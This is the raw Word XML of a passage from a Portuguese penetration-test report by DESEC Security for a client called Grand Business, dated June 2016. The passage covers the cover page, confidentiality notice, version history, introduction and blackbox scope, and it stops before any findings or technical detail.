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31152" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135C4731" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5623D274" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374D9A10" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371C1D32" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C98E8A5" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:id w:val="-40422693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140"/>
          <w:szCs w:val="140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D20B7B" w14:paraId="2CC82482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placeholder>
                  <w:docPart w:val="D52898FFFF1E4F5EB4B34C550A6670E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2121E7D9" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7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Relatório Teste de Intrusão</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="00D20B7B" w14:paraId="08613728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placeholder>
                  <w:docPart w:val="5D145E3A0D014D5FA2C4CE682CF61A0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152D5D4E" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="002E5EA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liente: GRAND BUSINESS</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="00D20B7B" w14:paraId="195B611A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48DA764" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7B">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:jc w:val="center"/>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00D20B7B" w14:paraId="2565AD6F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placeholder>
                  <w:docPart w:val="C98B6BFFA813483E9278C702C4778DC3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61A8D7A5" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="002E5EA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ESEC SECURITY</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="00D20B7B" w14:paraId="52F8FDDF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a"/>
                <w:id w:val="516659546"/>
                <w:placeholder>
                  <w:docPart w:val="C1177311645E4B59BBA2A7E08CA00FF8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06-0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48BB42A8" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="002E5EA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1/06/2016</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="353041DC" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7B"/>
        <w:p w14:paraId="175B5357" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7B"/>
        <w:tbl>
          <w:tblPr>
            <w:tblpPr w:leftFromText="187" w:rightFromText="187" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="bottom"/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8720"/>
          </w:tblGrid>
          <w:tr w:rsidR="00D20B7B" w14:paraId="773616FE" w14:textId="77777777" w:rsidTr="00D20B7B">
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:color w:val="FF0000"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:alias w:val="Resumo"/>
                <w:id w:val="8276291"/>
                <w:placeholder>
                  <w:docPart w:val="F0E419BA53104E27995CEEE9576C168B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14:paraId="2598EFD9" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7B">
                    <w:pPr>
                      <w:pStyle w:val="NoSpacing"/>
                    </w:pPr>
                    <w:r w:rsidRPr="00D20B7B">
                      <w:rPr>
                        <w:color w:val="FF0000"/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                      <w:t>ESTE RELATÓRIO CONTÉM INFORMAÇÃO CONFIDENCIAL E NÃO DEVE SER ENVIADO POR E-MAIL,FAX OU QUALQUER OUTRO MEIO ELETRÔNICO A MENOS QUE ESTE SEJA PREVIAMENTE APROVADO PELAS POLITICAS DE SEGURANÇA DA CONTRATANTE.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="711D1332" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7B"/>
        <w:p w14:paraId="03764800" w14:textId="77777777" w:rsidR="00D20B7B" w:rsidRDefault="00D20B7B">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="140"/>
              <w:szCs w:val="140"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:sz w:val="140"/>
              <w:szCs w:val="140"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6BB4CB97" w14:textId="77777777" w:rsidR="003C50ED" w:rsidRPr="003C50ED" w:rsidRDefault="003C50ED" w:rsidP="003C50ED">
      <w:p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F3446A" w14:textId="77777777" w:rsidR="006736F2" w:rsidRPr="003C50ED" w:rsidRDefault="00987A5F" w:rsidP="003C50ED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3C50E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6736F2" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Controle de </w:t>
      </w:r>
      <w:r w:rsidR="001A49AA" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Versões</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9440FE" w14:textId="77777777" w:rsidR="001A49AA" w:rsidRDefault="001A49AA" w:rsidP="001A49AA">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="LightShading-Accent1"/>
        <w:tblW w:w="8971" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2256"/>
        <w:gridCol w:w="2220"/>
        <w:gridCol w:w="2226"/>
        <w:gridCol w:w="2269"/>
      </w:tblGrid>
      <w:tr w:rsidR="006736F2" w14:paraId="2E522688" w14:textId="77777777" w:rsidTr="003C50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1E8E29BD" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F2">
            <w:pPr>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>DATA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EE40CDA" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F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ÃO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2226" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DCDF531" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2269" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01442528" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F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TERAÇÕES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006736F2" w14:paraId="6381A584" w14:textId="77777777" w:rsidTr="003C5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209CEF53" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="002E5EAE" w:rsidP="006736F2">
            <w:pPr>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>01/06</w:t>
            </w:r>
            <w:r w:rsidR="00E21271">
              <w:t>/201</w:t>
            </w:r>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F95FFCF" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F2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226" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78837051" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="00E21271" w:rsidP="006736F2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icardo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Longatto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2269" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6578B9ED" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="00987A5F" w:rsidP="006736F2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VERSÃ</w:t>
            </w:r>
            <w:r w:rsidR="006736F2">
              <w:t>O INICIAL;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006736F2" w14:paraId="04B077E2" w14:textId="77777777" w:rsidTr="003C50ED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7FB7B2C8" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F2">
            <w:pPr>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4552B032" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F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2226" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103E4CA7" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F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9" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="410F5804" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="006736F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VERSÃO FINAL;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00F3D832" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="25B9A765" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="5E578E21" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="5FF4756B" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="404981E8" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="5F097AAB" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="09B3E6B7" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="55A69FDE" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="744FF9FC" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="3B363FCB" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="2B3A2357" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="706A9D37" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="451E344D" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="32C9486A" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="6EEBC732" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="6645CE4F" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="1F08A45D" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="29963A56" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="003C50ED">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:t xml:space="preserve">01 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002E5EAE">
        <w:t>Junho</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002E5EAE">
        <w:t xml:space="preserve"> de 2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348B1B7" w14:textId="77777777" w:rsidR="00987A5F" w:rsidRDefault="00987A5F" w:rsidP="00987A5F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6D65D00" w14:textId="77777777" w:rsidR="005A2E4A" w:rsidRDefault="005A2E4A" w:rsidP="00987A5F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8BA803A" w14:textId="77777777" w:rsidR="006736F2" w:rsidRPr="005A2E4A" w:rsidRDefault="006736F2" w:rsidP="00987A5F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A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5F687" w14:textId="77777777" w:rsidR="006736F2" w:rsidRPr="005A2E4A" w:rsidRDefault="006736F2" w:rsidP="00987A5F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E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sr. José dos Santos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F817E" w14:textId="77777777" w:rsidR="006736F2" w:rsidRPr="005A2E4A" w:rsidRDefault="006736F2" w:rsidP="00987A5F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E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Segurança da Informação –</w:t>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Grand Business</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F7A08E" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2" w:rsidP="00987A5F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D742FF" w14:textId="77777777" w:rsidR="005A2E4A" w:rsidRDefault="005A2E4A" w:rsidP="00987A5F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0132218F" w14:textId="77777777" w:rsidR="006736F2" w:rsidRPr="005A2E4A" w:rsidRDefault="006736F2" w:rsidP="00987A5F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E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Considerações iniciais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E143B" w14:textId="77777777" w:rsidR="00685FFB" w:rsidRDefault="00685FFB" w:rsidP="00685FFB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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Através deste presente relatório </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">apresentamos o </w:t>
      </w:r>
      <w:r w:rsidRPr="00987A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Relatório de Teste de Intrusão</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>segundo o escopo definido pela proposta aprovada pel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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>partes envolvidas nesta análise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B1EDD" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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4FBB3DE" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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300C3D" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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95249AA" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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4E0DFDD" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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1F90AB5" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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A1CB178" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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D14234" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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BE5973D" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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1E7CA8A" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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51DFA1" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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3FD18F9" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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FB40176" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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A9197C" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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436936" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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cardo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Longa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| CEH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E281B2D" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRPr="003C50ED" w:rsidRDefault="002E5EAE" w:rsidP="00685FFB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t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er</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73A7702D" w14:textId="77777777" w:rsidR="006736F2" w:rsidRDefault="006736F2"/>
    <w:p w14:paraId="79875E96" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE"/>
    <w:p w14:paraId="5944A497" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE"/>
    <w:p w14:paraId="396B17B0" w14:textId="77777777" w:rsidR="002E5EAE" w:rsidRDefault="002E5EAE" w:rsidP="005A2E4A">
      <w:p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7884D1" w14:textId="77777777" w:rsidR="00D82358" w:rsidRPr="005A2E4A" w:rsidRDefault="00B07E0E" w:rsidP="005A2E4A">
      <w:p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- </w:t>
      </w:r>
      <w:r w:rsidR="00770FF4" w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="006C0750" w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ntrodução</w:t>
      </w:r>
      <w:r w:rsidR="00770FF4" w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> e objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C2384" w14:textId="77777777" w:rsidR="00D82358" w:rsidRDefault="00D82358" w:rsidP="005A2E4A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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESEC</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi contratada para conduzir um </w:t>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TESTE DE INVASÃO</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nos sistemas</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E5EAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GRANDBUSINESS</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. A avaliação foi conduzida de maneira a simular um ataque malicioso com objetivo de</w:t>
      </w:r>
      <w:r w:rsidR="00987A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> determinar o impacto que falhas de segurança podem ter no que diz respeito </w:t>
      </w:r>
      <w:r w:rsidR="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="00987A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> integridade, disponibilidade e confidencialidade do negócio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B2D69" w14:textId="77777777" w:rsidR="006C0750" w:rsidRPr="005A2E4A" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA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- </w:t>
      </w:r>
      <w:r w:rsidR="006C0750" w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Escopo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49E04D" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00770FF4" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>De acordo com o combinado e acordado entre as partes</w:t>
      </w:r>
      <w:r w:rsidR="00C95713" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o TESTE DE INTRUSÃO escolhido foi do tipo BLACKBOX (Sem conhecimento de informações), ou seja, a única informação oferecida pela CONTRATANTE foi uma URL.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="LightShading-Accent1"/>
        <w:tblW w:w="8693" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C95713" w:rsidRPr="003C50ED" w14:paraId="6F6C2A29" w14:textId="77777777" w:rsidTr="00A96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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432EA491" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="005A2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ED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</w:tc>
      </w:tr>
      <w:tr w:rsidR="00C95713" w:rsidRPr="003C50ED" w14:paraId="7432EA1B" w14:textId="77777777" w:rsidTr="00A9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3" w:type="dxa"/>
          </w:tcPr>
